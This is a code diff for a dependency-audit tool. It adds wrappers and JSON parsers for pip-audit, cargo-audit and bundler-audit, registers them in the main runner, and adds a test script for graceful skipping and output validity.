+    "lockfile": { "dependency-count": 45 },
+    "vulnerabilities": {
+      "found": true,
+      "count": 2,
+      "list": [
+        {
+          "advisory": {
+            "id": "RUSTSEC-2023-0001",
+            "package": "openssl",
+            "title": "Use after free in EVP_KEY_CTX",
+            "description": "...",
+            "date": "2023-01-01",
+            "url": "https://rustsec.org/advisories/RUSTSEC-2023-0001.html",
+            "aliases": ["CVE-2023-0001"],
+            "severity": "high"
+          },
+          "versions": {
+            "patched": [">=1.0.2u"],
+            "unaffected": []
+          },
+          "affected": {
+            "package": {
+              "name": "openssl",
+              "version": "1.0.2t",
+              "source": "registry+..."
+            },
+            "cvss": "CVSS:3.1/..."
+          }
+        }
+      ]
+    },
+    "warnings": {
+      "list": [...]
+    }
+  }
+
+The "vulnerabilities.list" array is the primary signal.
+The "warnings" section (unmaintained, unsound, notice) is parsed as medium/low.
+"""
+
+import json
+import os
+import sys
+
+sys.path.insert(0, os.path.dirname(__file__))
+import normalize  # noqa: E402
+
+
+_SEVERITY_MAP = {
+    "critical": "critical",
+    "high": "high",
+    "medium": "medium",
+    "moderate": "medium",
+    "low": "low",
+    "info": "info",
+}
+
+
+def map_severity(raw):
+    if isinstance(raw, str):
+        return _SEVERITY_MAP.get(raw.lower(), "high")
+    return "high"
+
+
+def main(argv):
+    if len(argv) < 2:
+        sys.stderr.write("Usage: parse-cargo-audit.py <json_file>\n")
+        sys.exit(1)
+
+    json_file = argv[1]
+
+    try:
+        with open(json_file, "r", encoding="utf-8") as fh:
+            raw = fh.read().strip()
+    except OSError as exc:
+        sys.stderr.write("Cannot read {0}: {1}\n".format(json_file, exc))
+        sys.exit(0)
+
+    if not raw:
+        return
+
+    try:
+        data = json.loads(raw)
+    except json.JSONDecodeError as exc:
+        sys.stderr.write("Invalid JSON from cargo-audit: {0}\n".format(exc))
+        sys.exit(0)
+
+    if not isinstance(data, dict):
+        sys.stderr.write("Unexpected cargo-audit output shape (not a dict)\n")
+        sys.exit(0)
+
+    # --- vulnerabilities section ---
+    vulns_section = data.get("vulnerabilities", {})
+    vuln_list = vulns_section.get("list", []) if isinstance(vulns_section, dict) else []
+
+    for item in vuln_list:
+        if not isinstance(item, dict):
+            continue
+
+        advisory = item.get("advisory", {})
+        if not isinstance(advisory, dict):
+            continue
+
+        affected = item.get("affected", {})
+        pkg_obj = {}
+        if isinstance(affected, dict):
+            pkg_obj = affected.get("package", {}) or {}
+
+        vuln_id = advisory.get("id", "unknown")
+        title = advisory.get("title", "Vulnerable dependency")
+        description = advisory.get("description", "")
+        pkg_name = advisory.get("package", pkg_obj.get("name", "unknown"))
+        pkg_version = pkg_obj.get("version", "")
+        severity_raw = advisory.get("severity", "high")
+        severity = map_severity(severity_raw)
+        url = advisory.get("url", "")
+        aliases = advisory.get("aliases", [])
+
+        cve = ""
+        for alias in aliases:
+            if isinstance(alias, str) and alias.upper().startswith("CVE-"):
+                cve = alias
+                break
+
+        message = "{0} in {1} {2}".format(title, pkg_name, pkg_version).strip()
+        if description:
+            # Truncate long descriptions to keep messages readable
+            short_desc = description[:120].rstrip()
+            if len(description) > 120:
+                short_desc += "..."
+            message = "{0}: {1}".format(message, short_desc)
+        if cve:
+            message = "{0} [{1}]".format(message, cve)
+        if url:
+            message = "{0} -- {1}".format(message, url)
+
+        fp = normalize.make_content_fingerprint(
+            "{0}:{1}:{2}".format(vuln_id, pkg_name, pkg_version)
+        )
+
+        finding = normalize.make_finding(
+            check_id="deps/vulnerable-dependency",
+            rule_id=vuln_id,
+            severity=severity,
+            confidence="high",
+            path="Cargo.toml",
+            line=1,
+            message=message,
+            fingerprint=fp,
+            properties={
+                "tool": "cargo-audit",
+                "package": pkg_name,
+                "ecosystem": "rust",
+            },
+        )
+        normalize.emit_finding(finding)
+
+
+if __name__ == "__main__":
+    main(sys.argv)

--- a/modules/commands-extra/skills/audit/scripts/spine/parse-cargo-audit.py
+++ b/modules/commands-extra/skills/audit/scripts/spine/parse-cargo-audit.py
@@ -46,7 +46,8 @@ Assumed output shape (cargo-audit >= 0.17, rustsec advisory DB):
   }
 
 The "vulnerabilities.list" array is the primary signal.
-The "warnings" section (unmaintained, unsound, notice) is parsed as medium/low.
+The "warnings" section (unmaintained, unsound, notice) is NOT parsed; only CVE vulnerabilities
+are emitted.
 """
 
 import json

--- a/modules/commands-extra/skills/audit/scripts/spine/parse-pip-audit.py
+++ b/modules/commands-extra/skills/audit/scripts/spine/parse-pip-audit.py
@@ -1,0 +1,130 @@
+#!/usr/bin/env python3
+"""
+CCGM audit spine -- parse pip-audit JSON output -> finding.schema.json JSONL.
+
+Usage: parse-pip-audit.py <pip_audit_json_file>
+
+pip-audit --format json emits a single JSON object.
+
+Assumed output shape (pip-audit >= 2.0):
+  {
+    "dependencies": [
+      {
+        "name": "cryptography",
+        "version": "38.0.0",
+        "vulns": [
+          {
+            "id": "PYSEC-2023-123",
+            "fix_versions": ["41.0.0"],
+            "aliases": ["CVE-2023-12345"],
+            "description": "A buffer overflow vulnerability..."
+          }
+        ]
+      }
+    ]
+  }
+
+Packages with an empty "vulns" list are not vulnerable and are skipped.
+The "aliases" field may contain CVE IDs; the first CVE alias (if any) is
+appended to the message for human reference.
+"""
+
+import json
+import os
+import sys
+
+sys.path.insert(0, os.path.dirname(__file__))
+import normalize  # noqa: E402
+
+
+def main(argv):
+    if len(argv) < 2:
+        sys.stderr.write("Usage: parse-pip-audit.py <json_file>\n")
+        sys.exit(1)
+
+    json_file = argv[1]
+
+    try:
+        with open(json_file, "r", encoding="utf-8") as fh:
+            raw = fh.read().strip()
+    except OSError as exc:
+        sys.stderr.write("Cannot read {0}: {1}\n".format(json_file, exc))
+        sys.exit(0)
+
+    if not raw:
+        return
+
+    try:
+        data = json.loads(raw)
+    except json.JSONDecodeError as exc:
+        sys.stderr.write("Invalid JSON from pip-audit: {0}\n".format(exc))
+        sys.exit(0)
+
+    if not isinstance(data, dict):
+        sys.stderr.write("Unexpected pip-audit output shape (not a dict)\n")
+        sys.exit(0)
+
+    dependencies = data.get("dependencies", [])
+    if not isinstance(dependencies, list):
+        return
+
+    for dep in dependencies:
+        if not isinstance(dep, dict):
+            continue
+        vulns = dep.get("vulns", [])
+        if not vulns:
+            continue
+
+        pkg_name = dep.get("name", "unknown")
+        pkg_version = dep.get("version", "")
+
+        for vuln in vulns:
+            if not isinstance(vuln, dict):
+                continue
+
+            vuln_id = vuln.get("id", "unknown")
+            description = vuln.get("description", "Vulnerable dependency")
+            fix_versions = vuln.get("fix_versions", [])
+            aliases = vuln.get("aliases", [])
+
+            # Find first CVE alias for human reference
+            cve = ""
+            for alias in aliases:
+                if isinstance(alias, str) and alias.upper().startswith("CVE-"):
+                    cve = alias
+                    break
+
+            fix_note = ""
+            if fix_versions:
+                fix_note = " (fix: {0})".format(", ".join(str(v) for v in fix_versions))
+
+            message = "{0} in {1} {2}{3}".format(
+                description, pkg_name, pkg_version, fix_note
+            ).strip()
+            if cve:
+                message = "{0} [{1}]".format(message, cve)
+
+            fp = normalize.make_content_fingerprint(
+                "{0}:{1}:{2}".format(vuln_id, pkg_name, pkg_version)
+            )
+
+            finding = normalize.make_finding(
+                check_id="deps/vulnerable-dependency",
+                rule_id=vuln_id,
+                severity="high",
+                confidence="high",
+                path="requirements.txt",
+                line=1,
+                message=message,
+                fingerprint=fp,
+                properties={
+                    "tool": "pip-audit",
+                    "package": pkg_name,
+                    "ecosystem": "python",
+                },
+            )
+            normalize.emit_finding(finding)
+
+
+if __name__ == "__main__":
+    main(sys.argv)

--- a/modules/commands-extra/skills/audit/scripts/spine/run.sh
+++ b/modules/commands-extra/skills/audit/scripts/spine/run.sh
@@ -12,7 +12,8 @@
 #   --tools <list>   Comma-separated subset of tools to run (default: all)
 #                    Valid: gitleaks,semgrep,dep-audit,knip,eslint,
 #                           govulncheck,bandit,hadolint,actionlint,trivy,
-#                           zizmor,pinact,squawk,sqlfluff
+#                           zizmor,pinact,squawk,sqlfluff,
+#                           pip-audit,cargo-audit,bundler-audit
 #   --output <file>  Write aggregated JSONL to this file instead of stdout
 #
 # Output: JSONL -- one JSON object per line, either a finding or a note.
@@ -33,7 +34,7 @@ SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
 # Defaults
 # ---------------------------------------------------------------------------
 REPO_ROOT=""
-REQUESTED_TOOLS="gitleaks,semgrep,dep-audit,knip,eslint,govulncheck,bandit,hadolint,actionlint,trivy,zizmor,pinact,squawk,sqlfluff"
+REQUESTED_TOOLS="gitleaks,semgrep,dep-audit,knip,eslint,govulncheck,bandit,hadolint,actionlint,trivy,zizmor,pinact,squawk,sqlfluff,pip-audit,cargo-audit,bundler-audit"
 OUTPUT_FILE=""
 
 # ---------------------------------------------------------------------------
@@ -90,9 +91,12 @@ TOOL_WRAPPERS["zizmor"]="$SCRIPT_DIR/wrap-zizmor.sh"
 TOOL_WRAPPERS["pinact"]="$SCRIPT_DIR/wrap-pinact.sh"
 TOOL_WRAPPERS["squawk"]="$SCRIPT_DIR/wrap-squawk.sh"
 TOOL_WRAPPERS["sqlfluff"]="$SCRIPT_DIR/wrap-sqlfluff.sh"
+TOOL_WRAPPERS["pip-audit"]="$SCRIPT_DIR/wrap-pip-audit.sh"
+TOOL_WRAPPERS["cargo-audit"]="$SCRIPT_DIR/wrap-cargo-audit.sh"
+TOOL_WRAPPERS["bundler-audit"]="$SCRIPT_DIR/wrap-bundler-audit.sh"
 
 # Ordered execution list (stable, deterministic)
-TOOL_ORDER=(gitleaks semgrep dep-audit knip eslint govulncheck bandit hadolint actionlint trivy zizmor pinact squawk sqlfluff)
+TOOL_ORDER=(gitleaks semgrep dep-audit knip eslint govulncheck bandit hadolint actionlint trivy zizmor pinact squawk sqlfluff pip-audit cargo-audit bundler-audit)
 
 # ---------------------------------------------------------------------------
 # Parse requested tools into a set (using associative array for O(1) lookup)

--- a/modules/commands-extra/skills/audit/scripts/spine/wrap-bundler-audit.sh
+++ b/modules/commands-extra/skills/audit/scripts/spine/wrap-bundler-audit.sh
@@ -1,0 +1,68 @@
+#!/usr/bin/env bash
+# CCGM audit spine -- bundler-audit wrapper
+# Scans Ruby projects for known dependency vulnerabilities.
+#
+# Usage: wrap-bundler-audit.sh <repo_root>
+#
+# Detects Ruby projects by presence of Gemfile.lock.
+# Runs: bundle-audit check --format json (falls back to text on older versions)
+#
+# Output (stdout): JSONL
+# Exit code: always 0
+
+set -euo pipefail
+
+REPO_ROOT="${1:-}"
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+NORMALIZE_PY="$SCRIPT_DIR/normalize.py"
+PARSE_PY="$SCRIPT_DIR/parse-bundler-audit.py"
+
+if [[ -z "$REPO_ROOT" ]]; then
+  python3 "$NORMALIZE_PY" --emit-skip bundler-audit \
+    "deps/vulnerable-dependency:no repo_root argument supplied"
+  exit 0
+fi
+
+# Only run if this looks like a Ruby project with a lockfile
+if [[ ! -f "$REPO_ROOT/Gemfile.lock" ]]; then
+  python3 "$NORMALIZE_PY" --emit-skip bundler-audit \
+    "deps/vulnerable-dependency:no Gemfile.lock found -- bundler-audit skipped"
+  exit 0
+fi
+
+if ! command -v bundle-audit > /dev/null 2>&1; then
+  python3 "$NORMALIZE_PY" --emit-skip bundler-audit \
+    "deps/vulnerable-dependency:bundle-audit not installed -- Ruby vulnerability scan skipped"
+  exit 0
+fi
+
+TMPFILE="$(mktemp /tmp/ccgm-bundler-audit-XXXXXX.json)"
+trap 'rm -f "$TMPFILE"' EXIT
+
+# Try JSON format first (bundler-audit >= 0.9 supports --format json).
+# bundle-audit exits non-zero when vulnerabilities are found; that is expected.
+set +e
+(
+  cd "$REPO_ROOT"
+  bundle-audit check --format json 2>/dev/null > "$TMPFILE" || true
+)
+set -e
+
+# If JSON output is empty or not valid JSON, fall back to text format
+if [[ ! -s "$TMPFILE" ]] || ! python3 -c "import json,sys; json.load(open(sys.argv[1]))" "$TMPFILE" 2>/dev/null; then
+  rm -f "$TMPFILE"
+  TMPFILE="$(mktemp /tmp/ccgm-bundler-audit-text-XXXXXX.txt)"
+  trap 'rm -f "$TMPFILE"' EXIT
+  set +e
+  (
+    cd "$REPO_ROOT"
+    bundle-audit check 2>/dev/null > "$TMPFILE" || true
+  )
+  set -e
+fi
+
+if [[ ! -s "$TMPFILE" ]]; then
+  exit 0
+fi
+
+python3 "$PARSE_PY" "$TMPFILE"

--- a/modules/commands-extra/skills/audit/scripts/spine/wrap-cargo-audit.sh
+++ b/modules/commands-extra/skills/audit/scripts/spine/wrap-cargo-audit.sh
@@ -1,0 +1,56 @@
+#!/usr/bin/env bash
+# CCGM audit spine -- cargo-audit wrapper
+# Scans Rust projects for known dependency vulnerabilities.
+#
+# Usage: wrap-cargo-audit.sh <repo_root>
+#
+# Detects Rust projects by presence of Cargo.toml.
+# Runs: cargo audit --json
+#
+# Output (stdout): JSONL
+# Exit code: always 0
+
+set -euo pipefail
+
+REPO_ROOT="${1:-}"
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+NORMALIZE_PY="$SCRIPT_DIR/normalize.py"
+PARSE_PY="$SCRIPT_DIR/parse-cargo-audit.py"
+
+if [[ -z "$REPO_ROOT" ]]; then
+  python3 "$NORMALIZE_PY" --emit-skip cargo-audit \
+    "deps/vulnerable-dependency:no repo_root argument supplied"
+  exit 0
+fi
+
+# Only run if this looks like a Rust project
+if [[ ! -f "$REPO_ROOT/Cargo.toml" ]]; then
+  python3 "$NORMALIZE_PY" --emit-skip cargo-audit \
+    "deps/vulnerable-dependency:no Cargo.toml found -- cargo-audit skipped"
+  exit 0
+fi
+
+if ! command -v cargo-audit > /dev/null 2>&1; then
+  python3 "$NORMALIZE_PY" --emit-skip cargo-audit \
+    "deps/vulnerable-dependency:cargo-audit not installed -- Rust vulnerability scan skipped"
+  exit 0
+fi
+
+TMPFILE="$(mktemp /tmp/ccgm-cargo-audit-XXXXXX.json)"
+trap 'rm -f "$TMPFILE"' EXIT
+
+# Run cargo audit -- repo path is passed via cd into subshell;
+# never interpolated into the audit command string itself.
+# cargo audit exits non-zero when vulnerabilities are found; that is expected.
+set +e
+(
+  cd "$REPO_ROOT"
+  cargo audit --json 2>/dev/null > "$TMPFILE" || true
+)
+set -e
+
+if [[ ! -s "$TMPFILE" ]]; then
+  exit 0
+fi
+
+python3 "$PARSE_PY" "$TMPFILE"

--- a/modules/commands-extra/skills/audit/scripts/spine/wrap-pip-audit.sh
+++ b/modules/commands-extra/skills/audit/scripts/spine/wrap-pip-audit.sh
@@ -5,7 +5,7 @@
 # Usage: wrap-pip-audit.sh <repo_root>
 #
 # Detects Python projects by presence of requirements.txt or pyproject.toml.
-# Runs: pip-audit --format json (or --json on older versions)
+# Runs: pip-audit --format json
 #
 # Output (stdout): JSONL
 # Exit code: always 0

--- a/modules/commands-extra/skills/audit/scripts/spine/wrap-pip-audit.sh
+++ b/modules/commands-extra/skills/audit/scripts/spine/wrap-pip-audit.sh
@@ -1,0 +1,58 @@
+#!/usr/bin/env bash
+# CCGM audit spine -- pip-audit wrapper
+# Scans Python projects for known dependency vulnerabilities.
+#
+# Usage: wrap-pip-audit.sh <repo_root>
+#
+# Detects Python projects by presence of requirements.txt or pyproject.toml.
+# Runs: pip-audit --format json (or --json on older versions)
+#
+# Output (stdout): JSONL
+# Exit code: always 0
+
+set -euo pipefail
+
+REPO_ROOT="${1:-}"
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+NORMALIZE_PY="$SCRIPT_DIR/normalize.py"
+PARSE_PY="$SCRIPT_DIR/parse-pip-audit.py"
+
+if [[ -z "$REPO_ROOT" ]]; then
+  python3 "$NORMALIZE_PY" --emit-skip pip-audit \
+    "deps/vulnerable-dependency:no repo_root argument supplied"
+  exit 0
+fi
+
+# Only run if this looks like a Python project
+if [[ ! -f "$REPO_ROOT/requirements.txt" && \
+      ! -f "$REPO_ROOT/pyproject.toml" && \
+      ! -f "$REPO_ROOT/setup.py" && \
+      ! -f "$REPO_ROOT/Pipfile" ]]; then
+  python3 "$NORMALIZE_PY" --emit-skip pip-audit \
+    "deps/vulnerable-dependency:no Python manifest found -- pip-audit skipped"
+  exit 0
+fi
+
+if ! command -v pip-audit > /dev/null 2>&1; then
+  python3 "$NORMALIZE_PY" --emit-skip pip-audit \
+    "deps/vulnerable-dependency:pip-audit not installed -- Python vulnerability scan skipped"
+  exit 0
+fi
+
+TMPFILE="$(mktemp /tmp/ccgm-pip-audit-XXXXXX.json)"
+trap 'rm -f "$TMPFILE"' EXIT
+
+# Run pip-audit -- repo path is passed as argv via cd into subshell;
+# never interpolated into the audit command string itself.
+set +e
+(
+  cd "$REPO_ROOT"
+  pip-audit --format json 2>/dev/null > "$TMPFILE" || true
+)
+set -e
+
+if [[ ! -s "$TMPFILE" ]]; then
+  exit 0
+fi
+
+python3 "$PARSE_PY" "$TMPFILE"

--- a/modules/commands-extra/skills/audit/tests/test-pack-dependencies-deep.sh
+++ b/modules/commands-extra/skills/audit/tests/test-pack-dependencies-deep.sh
@@ -1,0 +1,667 @@
+#!/usr/bin/env bash
+# test-pack-dependencies-deep.sh
+# Tests for the deepened dependencies audit pack (Epic 4.1).
+#
+# Tests:
+#   1.  pack.json validates against pack.schema.json (registry validate_pack)
+#   2.  checks.md has all required template sections (lint-pack.py)
+#   3.  severity-rubric.json contains all dependencies/* check-ids from pack.json
+#   4.  lint-pack.py passes on the dependencies pack against the real rubric
+#   5.  Graceful-skip: wrap-pip-audit.sh exits 0 + coverage_gap when pip-audit absent
+#   6.  Graceful-skip: wrap-cargo-audit.sh exits 0 + coverage_gap when cargo-audit absent
+#   7.  Graceful-skip: wrap-bundler-audit.sh exits 0 + coverage_gap when bundle-audit absent
+#   8.  Graceful-skip: wrap-pip-audit.sh exits 0 + skip when no Python manifest present
+#   9.  Graceful-skip: wrap-cargo-audit.sh exits 0 + skip when no Cargo.toml present
+#  10.  Graceful-skip: wrap-bundler-audit.sh exits 0 + skip when no Gemfile.lock present
+#  11.  Unit test: parse-pip-audit.py emits valid deps/* findings from synthetic JSON
+#  12.  Unit test: parse-pip-audit.py sets properties.tool = "pip-audit"
+#  13.  Unit test: parse-pip-audit.py sets properties.ecosystem = "python"
+#  14.  Unit test: parse-cargo-audit.py emits valid deps/* findings from synthetic JSON
+#  15.  Unit test: parse-cargo-audit.py sets properties.tool = "cargo-audit"
+#  16.  Unit test: parse-cargo-audit.py sets properties.ecosystem = "rust"
+#  17.  Unit test: parse-bundler-audit.py emits valid deps/* findings from JSON format
+#  18.  Unit test: parse-bundler-audit.py emits valid deps/* findings from text format
+#  19.  Unit test: parse-bundler-audit.py sets properties.tool = "bundler-audit"
+#  20.  Unit test: parse-bundler-audit.py sets properties.ecosystem = "ruby"
+#  21.  Fixture repo (postinstall + unpinned): spine run with tools absent -> coverage_gap notes
+#  22.  shellcheck: 3 new wrapper scripts are shellcheck-clean
+#
+# Exit 0 = all tests passed; exit 1 = one or more failures.
+
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+AUDIT_DIR="$(cd "${SCRIPT_DIR}/.." && pwd)"
+SPINE_DIR="${AUDIT_DIR}/scripts/spine"
+PACK_DIR="${AUDIT_DIR}/packs/dependencies"
+LINTER="${AUDIT_DIR}/scripts/lint-pack.py"
+RUBRIC="${AUDIT_DIR}/schemas/severity-rubric.json"
+PARSE_PIP="${SPINE_DIR}/parse-pip-audit.py"
+PARSE_CARGO="${SPINE_DIR}/parse-cargo-audit.py"
+PARSE_BUNDLER="${SPINE_DIR}/parse-bundler-audit.py"
+WRAP_PIP="${SPINE_DIR}/wrap-pip-audit.sh"
+WRAP_CARGO="${SPINE_DIR}/wrap-cargo-audit.sh"
+WRAP_BUNDLER="${SPINE_DIR}/wrap-bundler-audit.sh"
+
+PASS=0
+FAIL=0
+ERRORS=()
+
+pass() {
+  printf '  [PASS] %s\n' "$1"
+  PASS=$((PASS + 1))
+}
+
+fail() {
+  printf '  [FAIL] %s\n' "$1"
+  ERRORS+=("$1")
+  FAIL=$((FAIL + 1))
+}
+
+# ---------------------------------------------------------------------------
+# Temp dir for the whole test run (trailing-XXXXXX mktemp per spec)
+# ---------------------------------------------------------------------------
+TESTRUN_TMPDIR="$(mktemp -d /tmp/ccgm-test-deps-deep-XXXXXX)"
+trap 'rm -rf "$TESTRUN_TMPDIR"' EXIT
+
+# Build a restricted PATH that excludes pip-audit, cargo-audit, bundle-audit
+SYSTEM_BINS=""
+for bin in python3 bash find mktemp rm printf head grep; do
+  BINPATH="$(command -v "$bin" 2>/dev/null || true)"
+  if [[ -n "$BINPATH" ]]; then
+    BINDIR="$(dirname "$BINPATH")"
+    case ":$SYSTEM_BINS:" in
+      *":$BINDIR:"*) ;;
+      *) SYSTEM_BINS="${SYSTEM_BINS:+$SYSTEM_BINS:}$BINDIR" ;;
+    esac
+  fi
+done
+RESTRICTED_PATH="$SYSTEM_BINS:/usr/bin:/bin"
+
+# ---------------------------------------------------------------------------
+# Test 1: pack.json validates via lint-pack.py (no rubric)
+# ---------------------------------------------------------------------------
+printf '\nTest 1: pack.json schema validation (no rubric)\n'
+
+if [[ ! -f "$PACK_DIR/pack.json" ]]; then
+  fail "pack.json does not exist at $PACK_DIR/pack.json"
+else
+  OUT="$(python3 "$LINTER" --packs-dir "$(dirname "$PACK_DIR")" --rubric "$TESTRUN_TMPDIR/no-rubric.json" 2>&1 || true)"
+  if echo "$OUT" | grep -q "^PASS: dependencies"; then
+    pass "pack.json passes schema validation (no rubric)"
+  else
+    fail "pack.json schema validation failed: $OUT"
+  fi
+fi
+
+# ---------------------------------------------------------------------------
+# Test 2: checks.md has all required template sections
+# ---------------------------------------------------------------------------
+printf '\nTest 2: checks.md has all required sections\n'
+
+if [[ ! -f "$PACK_DIR/checks.md" ]]; then
+  fail "checks.md does not exist at $PACK_DIR/checks.md"
+else
+  for section_pattern in \
+    "^## Scope" \
+    "^## applies_when Rationale" \
+    "^## Checks" \
+    "^## Quality Checklist"; do
+    if grep -qiE "$section_pattern" "$PACK_DIR/checks.md"; then
+      pass "checks.md contains section matching '$section_pattern'"
+    else
+      fail "checks.md missing section matching '$section_pattern'"
+    fi
+  done
+fi
+
+# ---------------------------------------------------------------------------
+# Test 3: severity-rubric.json contains all dependencies/* check-ids
+# ---------------------------------------------------------------------------
+printf '\nTest 3: rubric contains all dependencies/* check-ids from pack.json\n'
+
+if [[ ! -f "$RUBRIC" ]]; then
+  fail "severity-rubric.json not found at $RUBRIC"
+else
+  PACK_CHECK_IDS="$(python3 - "$PACK_DIR/pack.json" <<'PYEOF'
+import json, sys
+with open(sys.argv[1]) as f:
+    pack = json.load(f)
+for c in pack.get("checks", []):
+    print(c["id"])
+PYEOF
+)"
+  while IFS= read -r cid; do
+    [[ -z "$cid" ]] && continue
+    if python3 - "$RUBRIC" "$cid" <<'PYEOF'
+import json, sys
+with open(sys.argv[1]) as f:
+    rubric = json.load(f)
+checks = rubric.get("checks", {})
+cid = sys.argv[2]
+sys.exit(0 if cid in checks else 1)
+PYEOF
+    then
+      pass "rubric contains check-id '$cid'"
+    else
+      fail "rubric MISSING check-id '$cid'"
+    fi
+  done <<< "$PACK_CHECK_IDS"
+fi
+
+# ---------------------------------------------------------------------------
+# Test 4: lint-pack.py PASS on dependencies pack with real rubric
+# ---------------------------------------------------------------------------
+printf '\nTest 4: lint-pack.py PASS on dependencies pack (real rubric)\n'
+
+OUT="$(python3 "$LINTER" --packs-dir "$(dirname "$PACK_DIR")" --rubric "$RUBRIC" 2>&1 || true)"
+if echo "$OUT" | grep -q "^PASS: dependencies"; then
+  pass "lint-pack.py reports PASS for dependencies with real rubric"
+else
+  fail "lint-pack.py did NOT report PASS for dependencies: $OUT"
+fi
+
+# ---------------------------------------------------------------------------
+# Tests 5-7: Graceful-skip when tools absent (tools not installed)
+# ---------------------------------------------------------------------------
+printf '\nTest 5: wrap-pip-audit.sh graceful-skip when pip-audit absent\n'
+
+MINIMAL_PYTHON_REPO="$TESTRUN_TMPDIR/python-repo"
+mkdir -p "$MINIMAL_PYTHON_REPO"
+printf 'requests>=2.28.0\n' > "$MINIMAL_PYTHON_REPO/requirements.txt"
+
+PIP_OUT="$TESTRUN_TMPDIR/pip-absent.jsonl"
+set +e
+PATH="$RESTRICTED_PATH" bash "$WRAP_PIP" "$MINIMAL_PYTHON_REPO" > "$PIP_OUT" 2>/dev/null
+PIP_EXIT=$?
+set -e
+
+if [[ $PIP_EXIT -eq 0 ]]; then
+  pass "wrap-pip-audit.sh exits 0 when pip-audit absent"
+else
+  fail "wrap-pip-audit.sh exits $PIP_EXIT (expected 0)"
+fi
+
+if grep -q '"type":"skipped"\|"type":"coverage_gap"' "$PIP_OUT" 2>/dev/null; then
+  pass "wrap-pip-audit.sh emits skip/coverage_gap when pip-audit absent"
+else
+  fail "wrap-pip-audit.sh produced no skip/gap notes when pip-audit absent"
+fi
+
+# Valid JSONL check
+INVALID_JSON=0
+while IFS= read -r line; do
+  [[ -z "$line" ]] && continue
+  if ! python3 -c "import json,sys; json.loads(sys.argv[1])" "$line" 2>/dev/null; then
+    INVALID_JSON=$((INVALID_JSON + 1))
+  fi
+done < "$PIP_OUT"
+if [[ $INVALID_JSON -eq 0 ]]; then
+  pass "wrap-pip-audit.sh output is valid JSONL when pip-audit absent"
+else
+  fail "wrap-pip-audit.sh output has $INVALID_JSON invalid JSON lines"
+fi
+
+printf '\nTest 6: wrap-cargo-audit.sh graceful-skip when cargo-audit absent\n'
+
+MINIMAL_RUST_REPO="$TESTRUN_TMPDIR/rust-repo"
+mkdir -p "$MINIMAL_RUST_REPO"
+printf '[package]\nname = "myapp"\nversion = "0.1.0"\n' > "$MINIMAL_RUST_REPO/Cargo.toml"
+
+CARGO_OUT="$TESTRUN_TMPDIR/cargo-absent.jsonl"
+set +e
+PATH="$RESTRICTED_PATH" bash "$WRAP_CARGO" "$MINIMAL_RUST_REPO" > "$CARGO_OUT" 2>/dev/null
+CARGO_EXIT=$?
+set -e
+
+if [[ $CARGO_EXIT -eq 0 ]]; then
+  pass "wrap-cargo-audit.sh exits 0 when cargo-audit absent"
+else
+  fail "wrap-cargo-audit.sh exits $CARGO_EXIT (expected 0)"
+fi
+
+if grep -q '"type":"skipped"\|"type":"coverage_gap"' "$CARGO_OUT" 2>/dev/null; then
+  pass "wrap-cargo-audit.sh emits skip/coverage_gap when cargo-audit absent"
+else
+  fail "wrap-cargo-audit.sh produced no skip/gap notes when cargo-audit absent"
+fi
+
+printf '\nTest 7: wrap-bundler-audit.sh graceful-skip when bundle-audit absent\n'
+
+MINIMAL_RUBY_REPO="$TESTRUN_TMPDIR/ruby-repo"
+mkdir -p "$MINIMAL_RUBY_REPO"
+printf "GEM\n  remote: https://rubygems.org/\n  specs:\n    rack (2.2.4)\n\nBUNDLED WITH\n   2.4.0\n" > "$MINIMAL_RUBY_REPO/Gemfile.lock"
+
+BUNDLER_OUT="$TESTRUN_TMPDIR/bundler-absent.jsonl"
+set +e
+PATH="$RESTRICTED_PATH" bash "$WRAP_BUNDLER" "$MINIMAL_RUBY_REPO" > "$BUNDLER_OUT" 2>/dev/null
+BUNDLER_EXIT=$?
+set -e
+
+if [[ $BUNDLER_EXIT -eq 0 ]]; then
+  pass "wrap-bundler-audit.sh exits 0 when bundle-audit absent"
+else
+  fail "wrap-bundler-audit.sh exits $BUNDLER_EXIT (expected 0)"
+fi
+
+if grep -q '"type":"skipped"\|"type":"coverage_gap"' "$BUNDLER_OUT" 2>/dev/null; then
+  pass "wrap-bundler-audit.sh emits skip/coverage_gap when bundle-audit absent"
+else
+  fail "wrap-bundler-audit.sh produced no skip/gap notes when bundle-audit absent"
+fi
+
+# ---------------------------------------------------------------------------
+# Tests 8-10: Graceful-skip when no manifest present
+# ---------------------------------------------------------------------------
+printf '\nTest 8-10: Graceful-skip when no manifest present\n'
+
+EMPTY_REPO="$TESTRUN_TMPDIR/empty-repo"
+mkdir -p "$EMPTY_REPO"
+
+PIP_NO_MANIFEST="$TESTRUN_TMPDIR/pip-no-manifest.jsonl"
+set +e
+PATH="$RESTRICTED_PATH" bash "$WRAP_PIP" "$EMPTY_REPO" > "$PIP_NO_MANIFEST" 2>/dev/null
+PIP_NM_EXIT=$?
+set -e
+
+if [[ $PIP_NM_EXIT -eq 0 ]]; then
+  pass "wrap-pip-audit.sh exits 0 when no Python manifest"
+else
+  fail "wrap-pip-audit.sh exits $PIP_NM_EXIT (expected 0, no manifest)"
+fi
+
+if grep -q '"type":"skipped"\|"type":"coverage_gap"' "$PIP_NO_MANIFEST" 2>/dev/null; then
+  pass "wrap-pip-audit.sh emits skip/gap note when no Python manifest"
+else
+  fail "wrap-pip-audit.sh: no skip/gap note when no Python manifest"
+fi
+
+CARGO_NO_MANIFEST="$TESTRUN_TMPDIR/cargo-no-manifest.jsonl"
+set +e
+PATH="$RESTRICTED_PATH" bash "$WRAP_CARGO" "$EMPTY_REPO" > "$CARGO_NO_MANIFEST" 2>/dev/null
+CARGO_NM_EXIT=$?
+set -e
+
+if [[ $CARGO_NM_EXIT -eq 0 ]]; then
+  pass "wrap-cargo-audit.sh exits 0 when no Cargo.toml"
+else
+  fail "wrap-cargo-audit.sh exits $CARGO_NM_EXIT (expected 0, no manifest)"
+fi
+
+BUNDLER_NO_MANIFEST="$TESTRUN_TMPDIR/bundler-no-manifest.jsonl"
+set +e
+PATH="$RESTRICTED_PATH" bash "$WRAP_BUNDLER" "$EMPTY_REPO" > "$BUNDLER_NO_MANIFEST" 2>/dev/null
+BUNDLER_NM_EXIT=$?
+set -e
+
